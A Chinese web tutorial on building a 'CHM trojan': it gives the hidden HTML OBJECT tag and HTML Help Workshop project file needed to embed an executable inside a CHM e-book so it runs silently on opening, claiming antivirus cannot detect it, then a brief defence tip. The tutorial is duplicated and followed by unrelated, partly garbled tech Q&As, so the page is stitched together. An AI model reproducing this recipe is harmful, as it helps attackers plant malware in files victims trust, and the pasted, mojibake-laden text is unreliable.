CHM木马制作攻略
谈起CHM格式的电子书,可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗?今天笔者就以实例形式和大家一道分析一下。
Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop,汉化版本可以在http://www.sixvee.com/520yy/tools/cytkk-2.rar下载。
当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。
Step2:首先运行windows.chm,在右侧的空白处点击右键菜单,进入“属性”页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。
Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页,例如cytkk.htm,源代码如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="灰色按钮克星.exe">
</OBJECT>
</BODY>
</HTML>
代码注释:
content="3是转向时间(单位为秒),可以根据木马程序的运行时间自行修改,建议不要超过5秒。WWw.ItCoMputeR.cOm.CN其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以根据情况更改。
Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc(对应帮助文档左侧的“目录”项)和windows.hhk(对应帮助文档左侧的“索引”项)。
Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下建立一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
灰色按钮克星.exe
代码注释:
windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。
最后用HTML Help Workshop打开cytkk.hhp,点击“文件”→“编译”,待提示完成后,就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。
高手传经:防之有道
我们不可能对下载的每本书都进行反编译工作来加以检查,那是会累死人的。笔者建议大家在下载电子书籍时,尽量去知名网站下载。
另外读者朋友们也可以修改本地安全属性,使CHM木马无法在本地运行木马程序,将注册表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004项的值由原来十进制的0改为十六进制的3。
realsched.exe进程如何关闭 装了RealPlayer或RealOne后,打开Windows任务管理器,在进程里面会发现多了一个realsched.exe,而且是开机就有,虽然占用内存很少,但对于追求简洁美的用户来说看起来着实不爽,请问realsched.exe进程如何关闭呢?
首先打开RealPlayer或RealOne,单击“工具→首选项”,分别去掉“自动服务”中“检查最新下载的媒体,添加到我的媒体库”和“自动下载和安装重要更新”前的复选框,按“确定”。(本文为WWW.SQ120.COM电脑知识网推荐文章)
然后打开“首选项→自动服务→Real消息中心”,去掉“检查新消息”前的复选框,按“确定”。 在弹出的警告窗口点击“是”,这样,你就可以让realsched.exe进程彻底消失。
提示缺少Svchosts.exe文件
Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop,汉化版本可以在http://www.sixvee.com/520yy/tools/cytkk-2.rar下载。
当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。
Step2:首先运行windows.chm,在右侧的空白处点击右键菜单,进入“属性”页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。
Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页,例如cytkk.htm,源代码如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="灰色按钮克星.exe">
</OBJECT>
</BODY>
</HTML>
代码注释:
content="3是转向时间(单位为秒),可以根据木马程序的运行时间自行修改,建议不要超过5秒。WWw.ItCoMputeR.cOm.CN其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以根据情况更改。
Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc(对应帮助文档左侧的“目录”项)和windows.hhk(对应帮助文档左侧的“索引”项)。
Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下建立一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
灰色按钮克星.exe
代码注释:
windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。
最后用HTML Help Workshop打开cytkk.hhp,点击“文件”→“编译”,待提示完成后,就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。
高手传经:防之有道
我们不可能对下载的每本书都进行反编译工作来加以检查,那是会累死人的。笔者建议大家在下载电子书籍时,尽量去知名网站下载。
另外读者朋友们也可以修改本地安全属性,使CHM木马无法在本地运行木马程序,将注册表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004项的值由原来十进制的0改为十六进制的3。
realsched.exe进程如何关闭 装了RealPlayer或RealOne后,打开Windows任务管理器,在进程里面会发现多了一个realsched.exe,而且是开机就有,虽然占用内存很少,但对于追求简洁美的用户来说看起来着实不爽,请问realsched.exe进程如何关闭呢?
首先打开RealPlayer或RealOne,单击“工具→首选项”,分别去掉“自动服务”中“检查最新下载的媒体,添加到我的媒体库”和“自动下载和安装重要更新”前的复选框,按“确定”。(本文为WWW.SQ120.COM电脑知识网推荐文章)
然后打开“首选项→自动服务→Real消息中心”,去掉“检查新消息”前的复选框,按“确定”。 在弹出的警告窗口点击“是”,这样,你就可以让realsched.exe进程彻底消失。
提示缺少Svchosts.exe文件
牐犖剩何沂褂玫氖荳indows XP系统。不知道为什么,近来启动电脑输入管理员密码后要过很久才能进入。进入后提示少了一个文件:C:\WINDOWS\Svchosts.exe,我搜索了但没找到这个文件,请问我该怎么办?
牐牬穑合低趁挥蠧:\WINDOWS\Svchosts.exe这个文件,说明你已经或曾经感染了计算机病毒。你可以运行msconfig,打开启动选项卡,在里面寻找命令中含有reg字样的选项,清除前面的复选框。